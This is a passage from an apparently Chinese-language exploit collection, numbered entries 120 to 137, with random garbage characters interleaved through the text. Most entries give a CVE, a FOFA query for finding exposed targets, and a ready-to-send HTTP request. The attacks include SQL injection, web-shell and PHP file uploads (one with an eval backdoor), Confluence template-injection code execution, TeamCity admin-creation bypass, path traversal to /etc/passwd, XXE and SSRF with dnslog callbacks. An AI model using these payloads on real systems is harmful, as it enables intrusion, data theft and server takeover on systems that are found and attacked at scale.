) ?3 d; ]  `" x2 k3 C先登录进入系统,默认账号密码为admin/admin/ R% }$ ]: G: H
POST /sysmanage/sysmanageajax.php HTTP/1.11* k6 ^; u0 R, w9 l6 X* P6 ~
Host: x.x.x.x
/ T3 N# C1 b* e, oCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
! I6 y; }; J0 q* H, eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.05 _4 P8 R3 C) H' {% P
Accept: */*
; F5 g* P3 _# l/ nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ \$ i. q, z: F/ {! e# `' G/ p0 h
Accept-Encoding: gzip, deflate% \2 y$ h; W( ^+ ^9 v
Content-Type: application/x-www-form-urlencoded;# Q9 Z0 i( b* I. ?2 L& s: N2 R7 ?( B( T
Content-Length: 109
- N, y( K# W0 j$ SOrigin: https://58.18.133.60:84438 ^8 }) M1 {9 V. @7 T, L  N
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
8 K# m3 {' J6 p0 _) e' {+ HSec-Fetch-Dest: empty
% e7 Q4 A4 ?( e6 Q5 O" TSec-Fetch-Mode: cors
/ F- v- |7 l4 }8 q! B9 {( Q& hSec-Fetch-Site: same-origin5 \7 o) d4 i0 X$ c
X-Forwarded-For: 1.1.1.1* P0 \- _  y& r0 a, s
X-Originating-Ip: 1.1.1.1  t' S4 v3 c0 d+ h( M, \! y5 y
X-Remote-Ip: 1.1.1.1# M6 j$ W: A+ |0 A/ r$ r# k* O/ R, W
X-Remote-Addr: 1.1.1.1. Z" ^* T+ n: ]4 m. C# r
Te: trailers: Z" \2 H& {0 `8 q& |/ |6 ?
Connection: close5 W4 [. K  A& [( S# [& H* P" Q5 ]3 g7 X$ @

* V' H6 ]+ \  s! R6 X. Lsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234562 r' M6 _( s, U% q; C) P! ~' X
# [: y) Z8 `" k: a2 t' `

: m7 t5 E4 J8 }8 _. v120. 北京百绰智能S40管理平台导入web.php任意文件上传
$ _/ l: S4 ^  y! K0 W& ICVE-2024-1253  B4 J& O! L8 c% _" v& u
FOFA:title="Smart管理平台"- Y7 r% ~* N* N% t* e7 H$ I
POST /useratte/web.php? HTTP/1.10 d6 _5 O) U! N* B8 y6 }1 l
Host: ip:port
# E9 P, e! Z- o* |5 @) N" u8 s) S+ @: bCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db. W6 e7 {. J9 i5 v3 |4 M" }  ^+ q3 F
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko' z% x5 _. n& a% y8 `* U4 c2 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) H4 ?7 j+ z4 B9 M. ]. ^" v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 e( z; N3 ^8 m6 q5 c
Accept-Encoding: gzip, deflate6 F, V6 C7 _7 F/ C
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
% x1 j7 A# M" Y* T: @9 I" O: `Content-Length: 597
% g1 e7 }7 W$ O% kOrigin: https://ip:port  w7 g/ T$ \2 o8 E1 z# R  J
Referer: https://ip:port/sysmanage/licence.php
7 T; a, i! {. l: E# l1 XUpgrade-Insecure-Requests: 1
8 d" @" M; U% \1 J- @& y, K( CSec-Fetch-Dest: document
9 H- I5 T* M) d( P$ m' }Sec-Fetch-Mode: navigate0 v* I+ }2 K/ m- V/ k! w3 e8 w: `
Sec-Fetch-Site: same-origin  T: U1 Q: {# T
Sec-Fetch-User: ?14 x, L6 `4 e& i5 m
Te: trailers. V. L$ M4 J/ v- |' o
Connection: close
5 d3 c7 V! f6 t' R# l9 T4 W% \0 i* \9 s3 L5 m* i% ]' I' r
-----------------------------42328904123665875270630079328( _: C7 m+ i; U$ K8 R
Content-Disposition: form-data; name="file_upload"; filename="2.php"
6 S- w7 E! [# |# @% \Content-Type: application/octet-stream
+ j0 M( k5 `# Z6 d, w- E$ M8 T3 u% i' |0 r
<?php phpinfo()?>- I6 L: {, Z* |, f
-----------------------------42328904123665875270630079328& d' y0 A7 z2 C% B
Content-Disposition: form-data; name="id_type"; [' B. U8 I8 f! I
6 \: T1 I$ l6 O
10 g" F. C) x; h9 h6 `
-----------------------------42328904123665875270630079328
+ B9 s' Y5 i$ K6 z( fContent-Disposition: form-data; name="1_ck"
4 {3 Y9 ^4 p: D, a# E5 G! l8 w1 b# j3 B
1_radhttp
4 f# F8 ~. x8 _9 C4 E) |: ~6 W0 q-----------------------------42328904123665875270630079328
& n8 J! z7 {: E0 ZContent-Disposition: form-data; name="mode"( d# @: Z0 y: N; ?- U' b

5 J* d2 A& A( E- A4 V* ?import  q. ]; `  ?7 x" X. v2 W
-----------------------------423289041236658752706300793283 {$ Y2 r# w( K
2 E" x2 v1 w& U3 f
+ p% s8 F  T) U
文件路径/upload/2.php) ~+ r7 x4 Y* n; l  ^: c

/ ^& A/ ^: V/ Q6 c, e) q' f5 g( A121. 北京百绰智能S42管理平台userattestation.php任意文件上传+ y9 u4 X3 y+ v! a" L. I: t6 N0 j+ U
CVE-2024-19183 c3 _9 b+ q$ ?" o  s" l
FOFA:title="Smart管理平台"
! E/ z$ P& x- c8 ZPOST /useratte/userattestation.php HTTP/1.1; C  ^! M# A1 H& R! h
Host: 192.168.40.130:8443
% D1 x# C8 I7 c' X: D) gCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac500 ]6 Q- R' U  H
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
0 S3 P& D! w' c9 O5 Y% k- s. ]; JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# Z% ~) ^" D+ y" J" q1 _  ]7 a9 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- ?+ U1 O0 ]9 F! z
Accept-Encoding: gzip, deflate2 j6 O/ P- \, ^, O! ]6 z
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
/ c6 w. A7 y$ F$ {Content-Length: 592
3 B0 j1 G9 B; g: R7 YOrigin: https://192.168.40.130:8443
* g6 R+ y3 x" a( |Upgrade-Insecure-Requests: 1# [  m3 P9 E1 v" g  G
Sec-Fetch-Dest: document: o% i2 h7 Y5 P6 u6 G; X  F5 d6 f
Sec-Fetch-Mode: navigate
1 y0 [7 A; N2 n8 ISec-Fetch-Site: same-origin: Y" i/ z2 n& M3 R9 {& D$ q
Sec-Fetch-User: ?1
+ `3 J/ R7 F- o3 H( ZTe: trailers4 h" ~2 r+ h3 P3 }9 h0 Y  J6 e
Connection: close
" a/ U' y+ I( ?- x. a& t0 b3 ?; h  Y( z
-----------------------------42328904123665875270630079328
, K5 q; L$ v6 d; ZContent-Disposition: form-data; name="web_img"; filename="1.php"
9 w; i3 k) t" w$ dContent-Type: application/octet-stream
0 R$ Q0 S0 X. H$ r1 O
2 ~* H) q- W; M) ~5 }<?php phpinfo();?>6 E$ X" ^  x! I, J8 W6 f
-----------------------------423289041236658752706300793281 C3 ]$ ^3 V5 f' h
Content-Disposition: form-data; name="id_type"
+ l" B3 ^$ p% y+ c4 u! ^3 H5 ~) b$ t6 ~$ M/ |4 d  ~
1
4 K% @  ?9 c# o/ x0 f( H) N, i-----------------------------42328904123665875270630079328( ?& ^. v( j2 e0 Y/ F7 l
Content-Disposition: form-data; name="1_ck"3 M1 L4 H* u" i% m: @2 Z$ ?% A
3 p) ^* Q5 |7 C7 n1 G
1_radhttp
! K" @) D' z7 Z8 s8 G  @-----------------------------423289041236658752706300793285 G# u- L0 I2 Q0 k7 b% [8 i1 H
Content-Disposition: form-data; name="hidwel", t! {; S( [$ q$ k3 i% g

) V3 R1 f! y4 ?; w* B6 `set
1 o7 o! z; O- u8 g8 a9 ]: j-----------------------------42328904123665875270630079328
! d. [8 }5 V( G9 e  W& e, v7 I
. U8 k" d  I( m+ D. n
1 L% U( [; D% z( |boot/web/upload/weblogo/1.php) i, I# v0 F2 A+ r% c% g

: Q1 j$ `/ F: [: ~' H122. 北京百绰智能s200管理平台/importexport.php sql注入& f  J- |( b, Y* ^8 g- q
CVE-2024-27718FOFA:title="Smart管理平台"( x9 l% v0 K1 J* w8 B6 _
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()7 f! F7 P+ [. e' M% G
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
* t; l- W  d6 A+ t& |# kHost: x.x.x.x
5 Z) ~- |' q, u" ]) f3 ]: \Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
: c) ]  H/ x+ O: ^& a2 N$ I3 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) B2 b) M1 i) g0 T! C0 ]7 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 F) g+ t, Y4 AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& y- W' `$ n$ A; c) A1 X1 F( ^2 J
Accept-Encoding: gzip, deflate, br
- K* ?! x: p7 K2 \2 I: a! T/ XUpgrade-Insecure-Requests: 17 \6 p) K$ |" E8 @3 o  X/ e
Sec-Fetch-Dest: document
! a+ d$ C2 o' v  t; ?Sec-Fetch-Mode: navigate
4 s$ K! ]7 R- j* ySec-Fetch-Site: none
* L5 s3 c6 d2 H* L8 n" hSec-Fetch-User: ?1
" H) b7 O0 c: k. MTe: trailers  {; X# b. U" d, q+ ^
Connection: close
/ T0 t0 x. Y5 [. k% i$ H' V9 O# J& R. y6 }

% Z! }- C; O# x% i123. Atlassian Confluence 模板注入代码执行
( O/ x9 A7 I) _FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"8 w2 Z* y0 p& f  X2 v2 w
POST /template/aui/text-inline.vm HTTP/1.1) u/ ~3 J4 O, J  `: }
Host: localhost:8090% j, g! O+ ~4 R! y& K
Accept-Encoding: gzip, deflate, br1 I& e" _# W! n
Accept: */*
# K' l5 J& k$ f' |$ c# ^Accept-Language: en-US;q=0.9,en;q=0.8
2 m  O' Z1 t* w6 i4 a- ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
7 ~$ ^( J# H9 xConnection: close8 g3 {: z( M5 G! M, z& b& B
Content-Type: application/x-www-form-urlencoded' y( x- l. T: }! g5 o4 ^2 g
, J# s& c! o% p- ]' J) r7 P
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
5 r! v$ `8 |+ X; a' ^' z5 E0 n$ l0 f, V* }5 v7 i9 q5 y, c

9 m0 U! K- }6 B9 l/ |. N124. 湖南建研工程质量检测系统任意文件上传
0 ^, y( H" X/ T8 K  TFOFA:body="/Content/Theme/Standard/webSite/login.css"/ n; o5 y) b9 k; ^0 w2 S
POST /Scripts/admintool?type=updatefile HTTP/1.1
, c+ \2 m( j! y" P' M- m& {2 VHost: 192.168.40.130:8282
( L% c  x8 r' O6 m3 {$ H  eUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% P! ]3 o2 L: W. E0 z$ Z8 u7 VContent-Length: 72
+ j! H4 r. ^& Z% h* G8 N9 L2 l6 w. {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.85 r1 z/ v. o5 H1 S% |' N6 x! B9 b
Accept-Encoding: gzip, deflate, br
) T9 b1 Q7 R* X2 k6 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ w/ O9 J1 F# G8 z; hConnection: close, }" W/ g6 k5 J' Q2 W. W' c
Content-Type: application/x-www-form-urlencoded
  K. `& n4 _+ h
+ x6 X6 G" v3 K/ ufilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>5 [2 s) g( c! S1 P1 J
/ H  \1 q3 m) Z+ F& j. U
1 n, a1 j) o1 ?8 ?5 d
http://192.168.40.130:8282/Scripts/abcgcg.aspx9 ?* {9 D: _& ?$ A# y: s' I
0 r2 o# ^; D- R1 @) g; F, u
125. ConnectWise ScreenConnect身份验证绕过
$ p/ c+ D. K( z" kCVE-2024-1709
* T" V6 l3 k, w9 kFOFA:icon_hash="-82958153"
- [5 ], @  T8 U* Chttps://github.com/watchtowrlabs ... bypass-add-user-poc  ~9 P1 K: A( l! T; _
5 S7 f8 F% g4 e" ?

2 H" ~: V1 ]+ @2 X5 o9 |4 m使用方法
. N" v0 l; o% E% qpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!* h  x1 m) g6 q. Z& \, z5 q
9 }) p$ W( m6 {6 P- v

& }# I. A* X4 m/ ?# ^# U创建好用户后直接登录后台,可以执行系统命令。
5 D: Z0 ?3 y3 A. `" x4 W3 }+ n4 T4 p" j$ U
126. Aiohttp 路径遍历
8 @1 O. b' U( |- _9 j  y6 c! @  u- EFOFA:title=="ComfyUI"
+ M7 N+ `9 Y4 I4 n9 n6 K" E7 }GET /static/../../../../../etc/passwd HTTP/1.1* r$ k, k& e, v( G3 z9 r5 [* k
Host: x.x.x.x- r) i* Q/ i: v: H8 ?! r* K/ [, q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 q* `! M$ }) F, J+ i' f6 W' R0 KConnection: close
4 R  f& ^8 U6 B9 {% I3 n* KAccept: */*2 i8 g: ]: }6 k7 ]- h
Accept-Language: en- h4 [' K, k" e# f2 S& u! l7 E
Accept-Encoding: gzip
/ _8 w, r1 p% L/ L+ c3 o( ?" w7 e  _, }  @: f  S

5 ^) Y9 i/ e( L( Y5 a7 v. m127. 广联达Linkworks DataExchange.ashx XXE
+ Q- j4 b" w1 T, GFOFA:body="Services/Identification/login.ashx"
5 i+ i+ B# p) K! b% Y. ?POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1" u8 b8 b! b( h1 d6 Z. z5 i9 u2 a
Host: 192.168.40.130:8888$ p3 [( t' Z) G" w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
/ Y; O9 |% w8 @. K1 OContent-Length: 415
1 l8 Y, G/ x' ]( ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: g( }2 L, z, |- A  ~
Accept-Encoding: gzip, deflate7 I' {: Q! U; k) G! e5 u$ n3 a1 n
Accept-Language: zh-CN,zh;q=0.9
" O9 m  Z/ ]3 j% G0 f1 E' z; g% jConnection: close
4 `) o& v# k) }Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0  J4 O4 E, T( o; f
Purpose: prefetch; ?' l* M& G# C: m. r
Sec-Purpose: prefetch;prerender
' w# O) Y' G4 Y, z, k  V9 B. e7 h
2 A5 h! x# Q$ ~$ |9 H. L------WebKitFormBoundaryJGgV5l5ta05yAIe0
1 r7 L6 t( B6 F+ O6 y. AContent-Disposition: form-data;name="SystemName"/ U; I2 C) }% N3 [1 u, E7 d: t" o

# |. U1 W* R+ H3 x8 Z& L, WBIM
- m$ Y$ F8 |3 A6 H! J+ z( c+ ~3 f------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ o: W& x+ x* ^/ ~Content-Disposition: form-data;name="Params"" x% z  N) p  j6 J2 R9 ^! ~) T
Content-Type: text/plain
* m. f2 {$ }# [  Y
% E! i& i/ ?( d6 H1 W, ?$ r<?xml version="1.0" encoding="UTF-8"?>; P- I  l/ {; P# @, c- O
<!DOCTYPE test [
- \5 ?: I+ z! S- p% K# }; q# ~0 g<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">! @4 Z* a5 ]$ t* h" u
]
- l! [0 t, n# ]$ T>
( m' K& R1 }! ?  V/ ]<test>&t;</test>& n0 n+ I0 M+ c% U
------WebKitFormBoundaryJGgV5l5ta05yAIe0--. ~/ Z) R# a: F  x0 p* u
! z" X3 e# L2 g/ f0 P; p
8 A$ J1 U- |/ ^, u

( T- x1 k! K" l128. Adobe ColdFusion 反序列化
0 m( ?; i/ z+ s; w% PCVE-2023-382035 V0 z4 {4 z) `0 [) ^$ v
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)! _: R9 y! c5 L0 T* Q3 H! ~
FOFA:app="Adobe-ColdFusion"* }. Y1 v9 X" c! l, v
PAYLOAD: ]2 p+ q/ r3 U" X* b

9 n( r! \8 O, `) X( `- _129. Adobe ColdFusion 任意文件读取
& V: z& T. R$ x% A% H4 L$ Y4 zCVE-2024-20767
4 {$ w1 m! g  T9 F1 p! d- ^+ \6 {FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
& y7 V% X2 n; [0 _0 }" |第一步,获取uuid
1 H/ {$ h8 l  f2 h& JGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.16 K$ W* V8 Q0 A2 t2 ^, s
Host: x.x.x.x
2 K; _1 p3 b- e6 R& p- P3 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
$ L" H+ r# I, F. EAccept: */*
- _+ L8 Y% z+ C8 N* q% j6 `! v4 X# KAccept-Encoding: gzip, deflate6 j, d1 v. j9 B1 z5 |2 S, n& `
Connection: close
5 ^; R! W3 V  B9 r; ^, L7 y0 f1 n+ ~4 x
2 C6 \! U2 g( Z# I4 m6 r
第二步,读取/etc/passwd文件$ D& m9 M' F5 H, V% [( o
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.12 I# C( y. F# [7 y
Host: x.x.x.x0 i) l! b% R* c+ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 }$ B! ^" i" ?, l' v) }  s" h
Accept: */*
1 Z0 p( t( F0 `( T! R; g4 p- [+ ~Accept-Encoding: gzip, deflate
8 N/ J# w. {; X* F# G$ F. KConnection: close, n& e7 u' Z0 H+ [. r
uuid: 85f60018-a654-4410-a783-f81cbd5000b9! d" `% G) l& z' H8 U* x
; |. p  }0 b+ q) T
7 I; r( L# H( [9 w# u. ^. _1 g
130. Laykefu客服系统任意文件上传2 N6 o! v6 H0 e1 R* c* z' Z
FOFA:icon_hash="-334624619"
$ [- P; [- P1 z5 }POST /admin/users/upavatar.html HTTP/1.1
" i9 a( n3 \1 }' B* THost: 127.0.0.18 I# f( f. }  ]& R4 p
Accept: application/json, text/javascript, */*; q=0.01
& T& E) p- t9 c' `% dX-Requested-With: XMLHttpRequest
3 C9 I  X" b% ]2 `7 X2 DUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
) ?2 x6 l# Q. s, ~3 yContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
2 b6 ]7 n+ h& j0 w* W  k, F) rAccept-Encoding: gzip, deflate
6 G( E: d+ j5 f9 K, g# YAccept-Language: zh-CN,zh;q=0.9
+ C+ [& a9 y% k2 t4 D4 zCookie: user_name=1; user_id=3
; D, o; s. s: T# q9 E7 v1 l2 zConnection: close
/ @# u$ W( q2 e  a0 R
! M  J8 k7 w5 Q; q7 i5 W  ~, l------WebKitFormBoundary3OCVBiwBVsNuB2kR
! s( F" m3 Z& c8 PContent-Disposition: form-data; name="file"; filename="1.php"
; l* l4 i. w2 s- F( J9 |  p( uContent-Type: image/png
6 T  r" ?5 A( s, }+ y9 h $ `5 U2 n2 P# d; F
<?php phpinfo();@eval($_POST['sec']);?>5 m1 v+ i2 A9 X$ h1 `- |; z4 i" O
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
( W  X0 s6 ^* O$ f/ F1 R  P
  A# D, ~, O5 i  k9 b& z5 ]0 y
' R9 a; T# v) T) V0 h131. Mini-Tmall <=20231017 SQL注入# J4 J2 i0 E  R; ^% t8 ^
FOFA:icon_hash="-2087517259"8 K' D' N( B/ \# C. S: X
后台地址:http://localhost:8080/tmall/admin
( `$ B" m" j5 L0 s% }6 Jhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)! C6 [7 P; s' o. U. b: o/ N

9 B) {6 q9 Z  G3 M' @132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
- }, x6 I* j5 b7 DCVE-2024-271988 K( o3 U+ {3 N
FOFA:body="Log in to TeamCity"; S8 P" i  V" d
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
4 t9 X- W0 d+ z; {Host: 192.168.40.130:8111
, m8 U# L- P1 E* [( d: a6 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( L. T* ]: C; [/ N4 q3 _8 g1 E
Accept: */*
8 r' M: T5 h5 S% m2 S9 Y  e$ Y* dContent-Type: application/json" r6 ]+ l( Z7 Q: g# q: [; M
Accept-Encoding: gzip, deflate
$ g5 T  {0 U; \+ `; R. |2 `) Z* y' h. z  i8 K
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}- B" B1 {( [+ d4 x% S3 Q& C3 B
, |% S# @/ ]+ O6 ^0 E# Y) f  D# s
5 r" C' f# _9 n4 N
CVE-2024-27199  I1 z& Q% P. v2 ^+ O1 J' R
/res/../admin/diagnostic.jsp
( |# h& O' O: ~% Q, D/.well-known/acme-challenge/../../admin/diagnostic.jsp
, C% A* v( P, g: i% y# o9 ]/update/../admin/diagnostic.jsp  t3 C1 P8 M! O3 j" h: u
* u# w$ m; U, I( f! h) E, d

6 F6 X- P$ i1 L* t1 [% O2 aCVE-2024-27198-RCE.py
3 A7 Z- L- F. S. F: N! @7 g% Y; M2 _: u: ~* [" t
133. H5 云商城 file.php 文件上传
4 n! m0 E* O8 `FOFA:body="/public/qbsp.php"
6 Z, x5 v3 e$ B0 @! `POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
0 A) Z! h) B3 z3 Y8 C  ^Host: your-ip
$ }- W( m. y, u* A' bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' {5 c1 _( z+ c! O: B! m  E" V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx: N" F: P  P+ m3 F8 Q7 J

& ^0 c. V/ p, [3 U2 v------WebKitFormBoundaryFQqYtrIWb8iBxUCx& w" {# g2 J$ S7 S
Content-Disposition: form-data; name="file"; filename="rce.php": t" M, M$ @/ r5 y$ U# A5 N* J
Content-Type: application/octet-stream
  P+ C/ e$ A6 v# D6 Q' ~1 f# M5 K * U3 s. M4 j4 }! a
<?php system("cat /etc/passwd");unlink(__FILE__);?>
, X1 X9 k+ r- F7 f' P  j2 J5 y------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
+ Q9 p; n2 o4 g& C
% M2 |. c, n" n; R! n/ h- u8 \+ t1 n! h# F3 ?7 P

! J/ i0 w( \. V1 m  O) G0 O134. 网康NS-ASG应用安全网关index.php sql注入: c: @, i5 A9 y9 v
CVE-2024-2330
* h! @4 |' t' ?9 }# dNetentsec NS-ASG Application Security Gateway 6.3版本
0 ~$ U* \6 R2 y( K6 Y# _: X4 e7 }FOFA:app="网康科技-NS-ASG安全网关"
; v5 {; o# I" [" t  C$ _- fPOST /protocol/index.php HTTP/1.1) ^3 t8 a4 f$ Y" Y
Host: x.x.x.x# K: O, ?4 v* ?8 j1 G4 F( g, O
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
. P7 z) H$ y+ N( ^. hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
$ t/ [% f) u0 l# g& ZAccept: */*6 K  p) p* Z! `4 _! O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Q$ o4 u7 {) `* @1 f
Accept-Encoding: gzip, deflate
2 v5 F% {3 X, D' i0 m$ k, DSec-Fetch-Dest: empty
! v' A2 y. G# u/ ESec-Fetch-Mode: cors6 L6 Z" l7 u6 G4 b
Sec-Fetch-Site: same-origin
$ ]! o7 E, `! {* o% `8 JTe: trailers0 _! ?' q1 U; @: Y. y
Connection: close
5 c3 N1 m( Z1 ]; L7 Z4 W+ JContent-Type: application/x-www-form-urlencoded3 k0 S8 I0 q4 C! j/ K, \/ t3 |
Content-Length: 2635 ~& ?. f. M% R/ R1 p
) H# g3 Q  @) N& b. Y: n
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
/ ]' l  B( S* m# t0 p4 K" ^0 `6 A' D: ?) n* V
& Z1 ~4 X' |8 }
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
9 l  t3 E" R% l- P7 @2 i" ^6 w' N5 hCVE-2024-2022+ ]0 {# d8 s: x) C  @
Netentsec NS-ASG Application Security Gateway 6.3版本
9 d2 E1 W) n' R, oFOFA:app="网康科技-NS-ASG安全网关"
+ V+ W5 U  c7 W! s% aGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1( W4 u2 r0 Q0 f; v. ?
Host: x.x.x.x% l; X  S6 j3 e# D& ~1 n) b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 H2 X8 C0 N# b* @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ p5 f" u: [/ Q; o2 v# }& h9 n
Accept-Encoding: gzip, deflate
  u: I( d' I8 n6 g( ?$ r+ ]7 B& \Accept-Language: zh-CN,zh;q=0.94 Q5 p" p, E8 p8 h) H# M( G
Connection: close
( R) V# x2 [* S! {( \( a$ d
- c4 f0 d# z3 W, L1 @. d3 Q! j. B' w% E. x, m( H( |$ D
136. NextChat cors SSRF
% N" m9 v0 a5 i2 H% ZCVE-2023-49785# z6 A0 L! z3 c" q: \& W
FOFA:title="NextChat"
3 B! `$ H7 x* g& @! G! ~0 T" bGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
9 {" z1 g7 z2 y! c& y5 _Host: x.x.x.x:10000
0 e. x2 a4 A- b  P$ WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 u7 {2 x9 t0 v3 j" g$ T7 l' P
Connection: close: p/ O$ D8 [" I0 g, A
Accept: */*
6 z8 P# h" H: ?) s: h, _8 c- YAccept-Language: en+ B2 I0 {7 o7 @1 S- \0 _9 c- }( Q
Accept-Encoding: gzip
. F# y- E/ {0 H" i: r6 A1 s% b
& a" A, h# d5 j$ S" D# s9 b! t4 e/ v
2 U' O/ c# `! E& R* J137. 福建科立迅通信指挥调度平台down_file.php sql注入
3 q" J& @7 S* d5 m3 ZCVE-2024-2620
  F+ H9 `5 C7 X" |8 mFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 x  k  `$ R, f' I  D+ O
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
5 H0 b1 z. r: p" \& I+ OHost: x.x.x.x
4 |% D$ s( E6 a& o. U6 y: l# `" d- [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. ?4 ?' z* y6 H3 ^* C" FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
